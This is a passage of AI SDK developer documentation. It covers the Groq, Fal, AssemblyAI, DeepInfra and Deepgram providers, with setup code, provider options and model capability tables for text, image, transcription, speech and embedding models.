- Currently Free: Available at no additional charge during beta
Best Practices
- Use `toolChoice: 'required'` to ensure the browser search is activated
- Only supported on `openai/gpt-oss-20b` and `openai/gpt-oss-120b` models
- The tool works automatically - no configuration parameters needed
- Server-side execution means no additional API keys or setup required
Model Validation
The provider automatically validates model compatibility:
// ✅ Supported - will work
const result = await generateText({
model: groq('openai/gpt-oss-120b'),
tools: { browser_search: groq.tools.browserSearch({}) },
});
// ❌ Unsupported - will show warning and ignore tool
const unsupportedResult = await generateText({
  model: groq('gemma2-9b-it'),
  tools: { browser_search: groq.tools.browserSearch({}) },
});
// Warning: "Browser search is only supported on models: openai/gpt-oss-20b, openai/gpt-oss-120b"
Transcription Models
You can create models that call the Groq transcription API
using the .transcription() factory method.
The first argument is the model id e.g. whisper-large-v3.
const model = groq.transcription('whisper-large-v3');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the input language in ISO-639-1 (e.g. en) format will improve accuracy and latency.
import { experimental_transcribe as transcribe } from 'ai';
import { groq, type GroqTranscriptionModelOptions } from '@ai-sdk/groq';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: groq.transcription('whisper-large-v3'),
audio: await readFile('audio.mp3'),
providerOptions: {
groq: { language: 'en' } satisfies GroqTranscriptionModelOptions,
},
});
The following provider options are available:
- `timestampGranularities` *string[]*
  The granularity of the timestamps in the transcription. Defaults to `['segment']`. Possible values are `['word']`, `['segment']`, and `['word', 'segment']`. Note: There is no additional latency for segment timestamps, but generating word timestamps incurs additional latency. Important: Requires `responseFormat` to be set to `'verbose_json'`.
- `responseFormat` *string*
  The format of the response. Set to `'verbose_json'` to receive timestamps for audio segments and enable `timestampGranularities`. Set to `'text'` to return only the transcribed text. Optional.
- `language` *string*
  The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. `'en'`) will improve accuracy and latency. Optional.
- `prompt` *string*
  An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.
- `temperature` *number*
  The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.
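For example, to request word-level timestamps, which (per the note above) requires setting `responseFormat` to `'verbose_json'`:
import { experimental_transcribe as transcribe } from 'ai';
import { groq, type GroqTranscriptionModelOptions } from '@ai-sdk/groq';
import { readFile } from 'fs/promises';
const result = await transcribe({
  model: groq.transcription('whisper-large-v3'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    groq: {
      responseFormat: 'verbose_json', // required for timestampGranularities
      timestampGranularities: ['word'],
    } satisfies GroqTranscriptionModelOptions,
  },
});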
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| `whisper-large-v3` | | | | |
| `whisper-large-v3-turbo` | | | | |
---
title: Fal
description: Learn how to use Fal AI models with the AI SDK.
---
Fal Provider
Fal AI provides a generative media platform for developers with lightning-fast inference capabilities. Their platform offers optimized performance for running diffusion models, with speeds up to 4x faster than alternatives.
Setup
The Fal provider is available via the `@ai-sdk/fal` module. You can install it with `pnpm add @ai-sdk/fal` (or the equivalent command for npm, yarn, or bun).
Provider Instance
You can import the default provider instance fal from @ai-sdk/fal:
import { fal } from '@ai-sdk/fal';
If you need a customized setup, you can import createFal and create a provider instance with your settings:
import { createFal } from '@ai-sdk/fal';
const fal = createFal({
apiKey: 'your-api-key', // optional, defaults to FAL_API_KEY environment variable, falling back to FAL_KEY
baseURL: 'custom-url', // optional
headers: {
/* custom headers */
}, // optional
});
You can use the following optional settings to customize the Fal provider instance:
- `baseURL` *string*
  Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is `https://fal.run`.
- `apiKey` *string*
  API key that is being sent using the `Authorization` header. It defaults to the `FAL_API_KEY` environment variable, falling back to `FAL_KEY`.
- `headers` *Record<string,string>*
  Custom headers to include in the requests.
- `fetch` *(input: RequestInfo, init?: RequestInit) => Promise<Response>*
  Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Image Models
You can create Fal image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
Basic Usage
import { fal } from '@ai-sdk/fal';
import { generateImage } from 'ai';
import fs from 'fs';
const { image, providerMetadata } = await generateImage({
model: fal.image('fal-ai/flux/dev'),
prompt: 'A serene mountain landscape at sunset',
});
const filename = `image-${Date.now()}.png`;
fs.writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);
Fal image models may return additional information for the images and the request.
Here are some examples of properties that may be set for each image:
providerMetadata.fal.images[0].nsfw; // boolean, image is not safe for work
providerMetadata.fal.images[0].width; // number, image width
providerMetadata.fal.images[0].height; // number, image height
providerMetadata.fal.images[0].contentType; // string, mime type of the image
Model Capabilities
Fal offers many models optimized for different use cases. Here are a few popular examples. For a full list of models, see the Fal AI Search Page.
| Model | Description |
|---|---|
| `fal-ai/flux/dev` | FLUX.1 [dev] model for high-quality image generation |
| `fal-ai/flux-pro/kontext` | FLUX.1 Kontext [pro] handles both text and reference images as inputs, enabling targeted edits and complex transformations |
| `fal-ai/flux-pro/kontext/max` | FLUX.1 Kontext [max] with improved prompt adherence and typography generation |
| `fal-ai/flux-lora` | Super fast endpoint for FLUX.1 with LoRA support |
| `fal-ai/ideogram/character` | Generate consistent character appearances across multiple images. Maintain facial features, proportions, and distinctive traits |
| `fal-ai/qwen-image` | Qwen-Image foundation model with significant advances in complex text rendering and precise image editing |
| `fal-ai/omnigen-v2` | Unified image generation model for Image Editing, Personalized Image Generation, Virtual Try-On, Multi Person Generation and more |
| `fal-ai/bytedance/dreamina/v3.1/text-to-image` | Dreamina showcases superior picture effects with improvements in aesthetics, precise and diverse styles, and rich details |
| `fal-ai/recraft/v3/text-to-image` | SOTA in image generation with vector art and brand style capabilities |
| `fal-ai/wan/v2.2-a14b/text-to-image` | High-resolution, photorealistic images with fine-grained detail |
Fal models support the following aspect ratios:
- 1:1 (square HD)
- 16:9 (landscape)
- 9:16 (portrait)
- 4:3 (landscape)
- 3:4 (portrait)
- 16:10 (1280x800)
- 10:16 (800x1280)
- 21:9 (2560x1080)
- 9:21 (1080x2560)
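For example, you can request one of these ratios through the `aspectRatio` call setting of `generateImage` (a minimal sketch using `fal-ai/flux/dev`):
import { fal } from '@ai-sdk/fal';
import { generateImage } from 'ai';
const { image } = await generateImage({
  model: fal.image('fal-ai/flux/dev'),
  prompt: 'A serene mountain landscape at sunset',
  aspectRatio: '16:9', // landscape
});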
Key features of Fal models include:
- Up to 4x faster inference speeds compared to alternatives
- Optimized by the Fal Inference Engine™
- Support for real-time infrastructure
- Cost-effective scaling with pay-per-use pricing
- LoRA training capabilities for model personalization
Modify Image
Transform existing images using text prompts.
await generateImage({
model: fal.image('fal-ai/flux-pro/kontext/max'),
prompt: {
text: 'Put a donut next to the flour.',
images: [
'https://v3.fal.media/files/rabbit/rmgBxhwGYb2d3pl3x9sKf_output.png',
],
},
});
Images can also be passed as a base64-encoded string, a Uint8Array, an ArrayBuffer, or a Buffer.
A mask can be passed as well:
await generateImage({
model: fal.image('fal-ai/flux-pro/kontext/max'),
prompt: {
text: 'Put a donut next to the flour.',
images: [imageBuffer],
mask: maskBuffer,
},
});
Provider Options
Fal image models support flexible provider options through the providerOptions.fal object. You can pass any parameters supported by the specific Fal model's API. Common options include:
- `imageUrl` - Reference image URL for image-to-image generation (deprecated, use `prompt.images` instead)
- `strength` - Controls how much the output differs from the input image
- `guidanceScale` - Controls adherence to the prompt (range: 1-20)
- `numInferenceSteps` - Number of denoising steps (range: 1-50)
- `enableSafetyChecker` - Enable/disable safety filtering
- `outputFormat` - Output format: 'jpeg' or 'png'
- `syncMode` - Wait for completion before returning response
- `acceleration` - Speed of generation: 'none', 'regular', or 'high'
- `safetyTolerance` - Content safety filtering level (1-6, where 1 is strictest)
- `useMultipleImages` - When true, converts multiple input images to an `image_urls` array for models that support multiple images (e.g., `fal-ai/flux-2/edit`)
Refer to the Fal AI model documentation for model-specific parameters.
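For example, a minimal sketch passing a few of these options (the model and values here are illustrative):
import { fal } from '@ai-sdk/fal';
import { generateImage } from 'ai';
const { image } = await generateImage({
  model: fal.image('fal-ai/flux/dev'),
  prompt: 'A serene mountain lake at dawn',
  providerOptions: {
    fal: {
      numInferenceSteps: 28, // more denoising steps
      guidanceScale: 7.5, // stronger prompt adherence
      outputFormat: 'png',
    },
  },
});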
Advanced Features
Fal's platform offers several advanced capabilities:
- Private Model Inference: Run your own diffusion transformer models with up to 50% faster inference
- LoRA Training: Train and personalize models in under 5 minutes
- Real-time Infrastructure: Enable new user experiences with fast inference times
- Scalable Architecture: Scale to thousands of GPUs when needed
For more details about Fal's capabilities and features, visit the Fal AI documentation.
Transcription Models
You can create models that call the Fal transcription API
using the .transcription() factory method.
The first argument is the model id without the fal-ai/ prefix, e.g. wizper.
const model = fal.transcription('wizper');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the batchSize option will increase the number of audio chunks processed in parallel.
import { experimental_transcribe as transcribe } from 'ai';
import { fal, type FalTranscriptionModelOptions } from '@ai-sdk/fal';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: fal.transcription('wizper'),
audio: await readFile('audio.mp3'),
providerOptions: {
fal: { batchSize: 10 } satisfies FalTranscriptionModelOptions,
},
});
The following provider options are available:
- language string - Language of the audio file. Defaults to 'en'. If set to null, the language will be automatically detected. Accepts ISO language codes like 'en', 'fr', 'zh', etc. Optional.
- diarize boolean - Whether to diarize the audio file (identify different speakers). Defaults to true. Optional.
- chunkLevel string - Level of the chunks to return. Either 'segment' or 'word'. Default value: "segment". Optional.
- version string - Version of the model to use. All models are Whisper large variants. Default value: "3". Optional.
- batchSize number - Batch size for processing. Default value: 64. Optional.
- numSpeakers number - Number of speakers in the audio file. If not provided, the number of speakers will be automatically detected. Optional.
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| whisper | | | | |
| wizper | | | | |
Speech Models
You can create models that call Fal text-to-speech endpoints using the .speech() factory method.
Basic Usage
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { fal } from '@ai-sdk/fal';
const result = await generateSpeech({
model: fal.speech('fal-ai/minimax/speech-02-hd'),
text: 'Hello from the AI SDK!',
});
Model Capabilities
| Model | Description |
|---|---|
| fal-ai/minimax/voice-clone | Clone a voice from a sample audio and generate speech from text prompts |
| fal-ai/minimax/voice-design | Design a personalized voice from a text description and generate speech from text prompts |
| fal-ai/dia-tts/voice-clone | Clone dialog voices from a sample audio and generate dialogs from text prompts |
| fal-ai/minimax/speech-02-hd | Generate speech from text prompts and different voices |
| fal-ai/minimax/speech-02-turbo | Generate fast speech from text prompts and different voices |
| fal-ai/dia-tts | Directly generates realistic dialogue from transcripts with audio conditioning for emotion control. Produces natural nonverbals like laughter and throat clearing |
| resemble-ai/chatterboxhd/text-to-speech | Generate expressive, natural speech with Resemble AI's Chatterbox. Features unique emotion control, instant voice cloning from short audio, and built-in watermarking |
Provider Options
Pass provider-specific options via providerOptions.fal depending on the model:
- voice_setting object
  - voice_id (string): predefined voice ID
  - speed (number): 0.5–2.0
  - vol (number): 0–10
  - pitch (number): -12–12
  - emotion (enum): happy | sad | angry | fearful | disgusted | surprised | neutral
  - english_normalization (boolean)
- audio_setting object - Audio configuration settings specific to the model.
- language_boost enum - Chinese | Chinese,Yue | English | Arabic | Russian | Spanish | French | Portuguese | German | Turkish | Dutch | Ukrainian | Vietnamese | Indonesian | Japanese | Italian | Korean | Thai | Polish | Romanian | Greek | Czech | Finnish | Hindi | auto
- pronunciation_dict object - Custom pronunciation dictionary for specific words.
Model-specific parameters (e.g., audio_url, prompt, preview_text, ref_audio_url, ref_text) can be passed directly under providerOptions.fal and will be forwarded to the Fal API.
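As a sketch, these options are passed under providerOptions.fal; the voice ID and values below are illustrative:
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { fal } from '@ai-sdk/fal';
const result = await generateSpeech({
  model: fal.speech('fal-ai/minimax/speech-02-hd'),
  text: 'Hello from the AI SDK!',
  providerOptions: {
    fal: {
      voice_setting: {
        voice_id: 'Wise_Woman', // illustrative voice ID
        speed: 1.1,
        emotion: 'happy',
      },
    },
  },
});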
title: AssemblyAI description: Learn how to use the AssemblyAI provider for the AI SDK.
AssemblyAI Provider
The AssemblyAI provider contains language model support for the AssemblyAI transcription API.
Setup
The AssemblyAI provider is available in the @ai-sdk/assemblyai module. You can install it with:
pnpm add @ai-sdk/assemblyai
Provider Instance
You can import the default provider instance assemblyai from @ai-sdk/assemblyai:
import { assemblyai } from '@ai-sdk/assemblyai';
If you need a customized setup, you can import createAssemblyAI from @ai-sdk/assemblyai and create a provider instance with your settings:
import { createAssemblyAI } from '@ai-sdk/assemblyai';
const assemblyai = createAssemblyAI({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the AssemblyAI provider instance:
- apiKey string - API key that is sent using the Authorization header. It defaults to the ASSEMBLYAI_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation, e.g. for testing.
Transcription Models
You can create models that call the AssemblyAI transcription API
using the .transcription() factory method.
The first argument is the model id, e.g. best.
const model = assemblyai.transcription('best');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the contentSafety option will enable content safety filtering.
import { experimental_transcribe as transcribe } from 'ai';
import { assemblyai } from '@ai-sdk/assemblyai';
import { type AssemblyAITranscriptionModelOptions } from '@ai-sdk/assemblyai';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: assemblyai.transcription('best'),
audio: await readFile('audio.mp3'),
providerOptions: {
assemblyai: {
contentSafety: true,
} satisfies AssemblyAITranscriptionModelOptions,
},
});
The following provider options are available:
- audioEndAt number - End time of the audio in milliseconds. Optional.
- audioStartFrom number - Start time of the audio in milliseconds. Optional.
- autoChapters boolean - Whether to automatically generate chapters for the transcription. Optional.
- autoHighlights boolean - Whether to automatically generate highlights for the transcription. Optional.
- boostParam enum - Boost parameter for the transcription. Allowed values: 'low', 'default', 'high'. Optional.
- contentSafety boolean - Whether to enable content safety filtering. Optional.
- contentSafetyConfidence number - Confidence threshold for content safety filtering (25-100). Optional.
- customSpelling array of objects - Custom spelling rules for the transcription. Each object has from (array of strings) and to (string) properties. Optional.
- disfluencies boolean - Whether to include disfluencies (um, uh, etc.) in the transcription. Optional.
- entityDetection boolean - Whether to detect entities in the transcription. Optional.
- filterProfanity boolean - Whether to filter profanity in the transcription. Optional.
- formatText boolean - Whether to format the text in the transcription. Optional.
- iabCategories boolean - Whether to include IAB categories in the transcription. Optional.
- languageCode string - Language code for the audio. Supports numerous ISO-639-1 and ISO-639-3 language codes. Optional.
- languageConfidenceThreshold number - Confidence threshold for language detection. Optional.
- languageDetection boolean - Whether to enable language detection. Optional.
- multichannel boolean - Whether to process multiple audio channels separately. Optional.
- punctuate boolean - Whether to add punctuation to the transcription. Optional.
- redactPii boolean - Whether to redact personally identifiable information. Optional.
- redactPiiAudio boolean - Whether to redact PII in the audio file. Optional.
- redactPiiAudioQuality enum - Quality of the redacted audio file. Allowed values: 'mp3', 'wav'. Optional.
- redactPiiPolicies array of enums - Policies for PII redaction, specifying which types of information to redact. Supports numerous types like 'person_name', 'phone_number', etc. Optional.
- redactPiiSub enum - Substitution method for redacted PII. Allowed values: 'entity_name', 'hash'. Optional.
- sentimentAnalysis boolean - Whether to perform sentiment analysis on the transcription. Optional.
- speakerLabels boolean - Whether to label different speakers in the transcription. Optional.
- speakersExpected number - Expected number of speakers in the audio. Optional.
- speechThreshold number - Threshold for speech detection (0-1). Optional.
- summarization boolean - Whether to generate a summary of the transcription. Optional.
- summaryModel enum - Model to use for summarization. Allowed values: 'informative', 'conversational', 'catchy'. Optional.
- summaryType enum - Type of summary to generate. Allowed values: 'bullets', 'bullets_verbose', 'gist', 'headline', 'paragraph'. Optional.
- webhookAuthHeaderName string - Name of the authentication header for webhook requests. Optional.
- webhookAuthHeaderValue string - Value of the authentication header for webhook requests. Optional.
- webhookUrl string - URL to send webhook notifications to. Optional.
- wordBoost array of strings - List of words to boost in the transcription. Optional.
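Several of these options can be combined in one request. A minimal sketch (option values are illustrative):
import { experimental_transcribe as transcribe } from 'ai';
import { assemblyai } from '@ai-sdk/assemblyai';
import { readFile } from 'fs/promises';
const result = await transcribe({
  model: assemblyai.transcription('best'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    assemblyai: {
      speakerLabels: true, // label different speakers
      summarization: true, // generate a summary
      summaryType: 'bullets',
    },
  },
});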
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| best | | | | |
| nano | | | | |
title: DeepInfra description: Learn how to use DeepInfra's models with the AI SDK.
DeepInfra Provider
The DeepInfra provider contains support for state-of-the-art models through the DeepInfra API, including Llama 3, Mixtral, Qwen, and many other popular open-source models.
Setup
The DeepInfra provider is available via the @ai-sdk/deepinfra module. You can install it with:
pnpm add @ai-sdk/deepinfra
Provider Instance
You can import the default provider instance deepinfra from @ai-sdk/deepinfra:
import { deepinfra } from '@ai-sdk/deepinfra';
If you need a customized setup, you can import createDeepInfra from @ai-sdk/deepinfra and create a provider instance with your settings:
import { createDeepInfra } from '@ai-sdk/deepinfra';
const deepinfra = createDeepInfra({
apiKey: process.env.DEEPINFRA_API_KEY ?? '',
});
You can use the following optional settings to customize the DeepInfra provider instance:
- baseURL string - Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.deepinfra.com/v1. Note: Language models and embeddings use OpenAI-compatible endpoints at {baseURL}/openai, while image models use {baseURL}/inference.
- apiKey string - API key that is sent using the Authorization header. It defaults to the DEEPINFRA_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation, e.g. for testing.
Language Models
You can create language models using a provider instance. The first argument is the model ID, for example:
import { deepinfra } from '@ai-sdk/deepinfra';
import { generateText } from 'ai';
const { text } = await generateText({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
DeepInfra language models can also be used in the streamText function (see AI SDK Core).
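For example, a minimal streaming sketch:
import { deepinfra } from '@ai-sdk/deepinfra';
import { streamText } from 'ai';
const result = streamText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
// print the response as it streams in
for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}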
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| meta-llama/Llama-4-Maverick-17B-128E-Instruct-FP8 | | | | |
| meta-llama/Llama-4-Scout-17B-16E-Instruct | | | | |
| meta-llama/Llama-3.3-70B-Instruct-Turbo | | | | |
| meta-llama/Llama-3.3-70B-Instruct | | | | |
| meta-llama/Meta-Llama-3.1-405B-Instruct | | | | |
| meta-llama/Meta-Llama-3.1-70B-Instruct-Turbo | | | | |
| meta-llama/Meta-Llama-3.1-70B-Instruct | | | | |
| meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo | | | | |
| meta-llama/Meta-Llama-3.1-8B-Instruct | | | | |
| meta-llama/Llama-3.2-11B-Vision-Instruct | | | | |
| meta-llama/Llama-3.2-90B-Vision-Instruct | | | | |
| mistralai/Mixtral-8x7B-Instruct-v0.1 | | | | |
| deepseek-ai/DeepSeek-V3 | | | | |
| deepseek-ai/DeepSeek-R1 | | | | |
| deepseek-ai/DeepSeek-R1-Distill-Llama-70B | | | | |
| deepseek-ai/DeepSeek-R1-Turbo | | | | |
| nvidia/Llama-3.1-Nemotron-70B-Instruct | | | | |
| Qwen/Qwen2-7B-Instruct | | | | |
| Qwen/Qwen2.5-72B-Instruct | | | | |
| Qwen/Qwen2.5-Coder-32B-Instruct | | | | |
| Qwen/QwQ-32B-Preview | | | | |
| google/codegemma-7b-it | | | | |
| google/gemma-2-9b-it | | | | |
| microsoft/WizardLM-2-8x22B | | | | |
Image Models
You can create DeepInfra image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
import { deepinfra } from '@ai-sdk/deepinfra';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: deepinfra.image('stabilityai/sd3.5'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
});
Model-specific options
You can pass model-specific parameters using the providerOptions.deepinfra field:
import { deepinfra } from '@ai-sdk/deepinfra';
import { generateImage } from 'ai';
const { image } = await generateImage({
model: deepinfra.image('stabilityai/sd3.5'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
providerOptions: {
deepinfra: {
num_inference_steps: 30, // Control the number of denoising steps (1-50)
},
},
});
Image Editing
DeepInfra supports image editing through models like Qwen/Qwen-Image-Edit. Pass input images via prompt.images to transform or edit existing images.
Basic Image Editing
Transform an existing image using text prompts:
import { readFileSync } from 'node:fs';
import { deepinfra } from '@ai-sdk/deepinfra';
import { generateImage } from 'ai';
const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
  model: deepinfra.image('Qwen/Qwen-Image-Edit'),
  prompt: {
    text: 'Turn the cat into a golden retriever dog',
    images: [imageBuffer],
  },
  size: '1024x1024',
});
Inpainting with Mask
Edit specific parts of an image using a mask. Transparent areas in the mask indicate where the image should be edited:
const image = readFileSync('./input-image.png');
const mask = readFileSync('./mask.png');
const { images } = await generateImage({
model: deepinfra.image('Qwen/Qwen-Image-Edit'),
prompt: {
text: 'A sunlit indoor lounge area with a pool containing a flamingo',
images: [image],
mask: mask,
},
});
Multi-Image Combining
Combine multiple reference images into a single output:
const cat = readFileSync('./cat.png');
const dog = readFileSync('./dog.png');
const { images } = await generateImage({
model: deepinfra.image('Qwen/Qwen-Image-Edit'),
prompt: {
text: 'Create a scene with both animals together, playing as friends',
images: [cat, dog],
},
});
Model Capabilities
For models supporting aspect ratios, the following ratios are typically supported:
1:1 (default), 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21
For models supporting size parameters, dimensions must typically be:
- Multiples of 32
- Width and height between 256 and 1440 pixels
- Default size is 1024x1024
| Model | Dimensions Specification | Notes |
|---|---|---|
| stabilityai/sd3.5 | Aspect Ratio | Premium quality base model, 8B parameters |
| black-forest-labs/FLUX-1.1-pro | Size | Latest state-of-art model with superior prompt following |
| black-forest-labs/FLUX-1-schnell | Size | Fast generation in 1-4 steps |
| black-forest-labs/FLUX-1-dev | Size | Optimized for anatomical accuracy |
| black-forest-labs/FLUX-pro | Size | Flagship Flux model |
| black-forest-labs/FLUX.1-Kontext-dev | Size | Image editing and transformation model |
| black-forest-labs/FLUX.1-Kontext-pro | Size | Professional image editing and transformation |
| stabilityai/sd3.5-medium | Aspect Ratio | Balanced 2.5B parameter model |
| stabilityai/sdxl-turbo | Aspect Ratio | Optimized for fast generation |
For more details and pricing information, see the DeepInfra text-to-image models page.
Embedding Models
You can create DeepInfra embedding models using the .embeddingModel() factory method.
For more on embedding models with the AI SDK see embed().
import { deepinfra } from '@ai-sdk/deepinfra';
import { embed } from 'ai';
const { embedding } = await embed({
model: deepinfra.embeddingModel('BAAI/bge-large-en-v1.5'),
value: 'sunny day at the beach',
});
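You can also embed several values at once with embedMany; a minimal sketch:
import { deepinfra } from '@ai-sdk/deepinfra';
import { embedMany } from 'ai';
const { embeddings } = await embedMany({
  model: deepinfra.embeddingModel('BAAI/bge-large-en-v1.5'),
  values: ['sunny day at the beach', 'rainy afternoon in the city'],
});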
Model Capabilities
| Model | Dimensions | Max Tokens |
|---|---|---|
| BAAI/bge-base-en-v1.5 | 768 | 512 |
| BAAI/bge-large-en-v1.5 | 1024 | 512 |
| BAAI/bge-m3 | 1024 | 8192 |
| intfloat/e5-base-v2 | 768 | 512 |
| intfloat/e5-large-v2 | 1024 | 512 |
| intfloat/multilingual-e5-large | 1024 | 512 |
| sentence-transformers/all-MiniLM-L12-v2 | 384 | 256 |
| sentence-transformers/all-MiniLM-L6-v2 | 384 | 256 |
| sentence-transformers/all-mpnet-base-v2 | 768 | 384 |
| sentence-transformers/clip-ViT-B-32 | 512 | 77 |
| sentence-transformers/clip-ViT-B-32-multilingual-v1 | 512 | 77 |
| sentence-transformers/multi-qa-mpnet-base-dot-v1 | 768 | 512 |
| sentence-transformers/paraphrase-MiniLM-L6-v2 | 384 | 128 |
| shibing624/text2vec-base-chinese | 768 | 512 |
| thenlper/gte-base | 768 | 512 |
| thenlper/gte-large | 1024 | 512 |
title: Deepgram description: Learn how to use the Deepgram provider for the AI SDK.
Deepgram Provider
The Deepgram provider contains language model support for the Deepgram transcription and speech generation APIs.
Setup
The Deepgram provider is available in the @ai-sdk/deepgram module. You can install it with:
pnpm add @ai-sdk/deepgram
Provider Instance
You can import the default provider instance deepgram from @ai-sdk/deepgram:
import { deepgram } from '@ai-sdk/deepgram';
If you need a customized setup, you can import createDeepgram from @ai-sdk/deepgram and create a provider instance with your settings:
import { createDeepgram } from '@ai-sdk/deepgram';
const deepgram = createDeepgram({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the Deepgram provider instance:
- apiKey string - API key that is sent using the Authorization header. It defaults to the DEEPGRAM_API_KEY environment variable.
- headers Record<string,string> - Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response> - Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation, e.g. for testing.
Speech Models
You can create models that call the Deepgram text-to-speech API
using the .speech() factory method.
The first argument is the model id, which includes the voice. Deepgram embeds the voice directly in the model ID (e.g., aura-2-helena-en).
const model = deepgram.speech('aura-2-helena-en');
You can use the model with the generateSpeech function:
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { deepgram } from '@ai-sdk/deepgram';
const result = await generateSpeech({
model: deepgram.speech('aura-2-helena-en'),
text: 'Hello, world!',
});
You can also pass additional provider-specific options using the providerOptions argument:
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { deepgram, type DeepgramSpeechModelOptions } from '@ai-sdk/deepgram';
const result = await generateSpeech({
model: deepgram.speech('aura-2-helena-en'),
text: 'Hello, world!',
providerOptions: {
deepgram: {
encoding: 'linear16',
sampleRate: 24000,
} satisfies DeepgramSpeechModelOptions,
},
});
The following provider options are available:
- encoding string - Encoding type for the audio output. Supported values: 'linear16', 'mulaw', 'alaw', 'mp3', 'opus', 'flac', 'aac'. Optional.
- container string - Container format for the output audio. Supported values: 'wav', 'ogg', 'none'. Optional.
- sampleRate number - Sample rate for the output audio in Hz. Supported values depend on the encoding: 8000, 16000, 24000, 32000, 48000. Optional.
- bitRate number | string - Bitrate of the audio in bits per second. For mp3: 32000 or 48000. For opus: 4000 to 650000. For aac: 4000 to 192000. Optional.
- callback string - URL to which Deepgram will make a callback request with the audio. Optional.
- callbackMethod enum - HTTP method for the callback request. Allowed values: 'POST', 'PUT'. Optional.
- mipOptOut boolean - Opts requests out of the Deepgram Model Improvement Program. Optional.
- tag string | array of strings - Label your requests for identification during usage reporting. Optional.
Model Capabilities
| Model |
|---|
| aura-2-asteria-en |
| aura-2-thalia-en |
| aura-2-helena-en |
| aura-2-orpheus-en |
| aura-2-zeus-en |
| aura-asteria-en |
| aura-luna-en |
| aura-stella-en |
| + more voices |
Transcription Models
You can create models that call the Deepgram transcription API
using the .transcription() factory method.
The first argument is the model id, e.g. nova-3.
const model = deepgram.transcription('nova-3');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the summarize option will enable summaries for sections of content.
import { experimental_transcribe as transcribe } from 'ai';
import {
deepgram,
type DeepgramTranscriptionModelOptions,
} from '@ai-sdk/deepgram';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: deepgram.transcription('nova-3'),
audio: await readFile('audio.mp3'),
providerOptions: {
deepgram: {
summarize: true,
} satisfies DeepgramTranscriptionModelOptions,
},
});
The following provider options are available:
- language string - Language code for the audio. Supports numerous ISO-639-1 and ISO-639-3 language codes. Optional.
- detectLanguage boolean - Whether to enable automatic language detection. When true, Deepgram will detect the language of the audio. Optional.
- smartFormat boolean - Whether to apply smart formatting to the transcription. Optional.
- punctuate boolean - Whether to add punctuation to the transcription. Optional.
- summarize enum | boolean - Whether to generate a summary of the transcription. Allowed values: 'v2', false. Optional.
- topics boolean - Whether to detect topics in the transcription. Optional.
- detectEntities boolean - Whether to detect entities in the transcription. Optional.
- redact string | array of strings - Specifies what content to redact from the transcription. Optional.
- search string - Search term to find in the transcription. Optional.
- diarize boolean - Whether to identify different speakers in the transcription. Defaults to true. Optional.
- utterances boolean - Whether to segment the transcription into utterances. Optional.
- uttSplit number - Threshold for splitting utterances. Optional.
- fillerWords boolean - Whether to include filler words (um, uh, etc.) in the transcription. Optional.
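A minimal sketch combining a few of these options:
import { experimental_transcribe as transcribe } from 'ai';
import { deepgram } from '@ai-sdk/deepgram';
import { readFile } from 'fs/promises';
const result = await transcribe({
  model: deepgram.transcription('nova-3'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    deepgram: {
      smartFormat: true, // apply smart formatting
      diarize: true, // identify different speakers
      fillerWords: false, // drop um/uh from the transcript
    },
  },
});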
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| nova-3 (+ variants) | | | | |
| nova-2 (+ variants) | | | | |
| nova (+ variants) | | | | |
| enhanced (+ variants) | | | | |
| base (+ variants) | | | | |
title: Black Forest Labs description: Learn how to use Black Forest Labs models with the AI SDK.
Black Forest Labs Provider
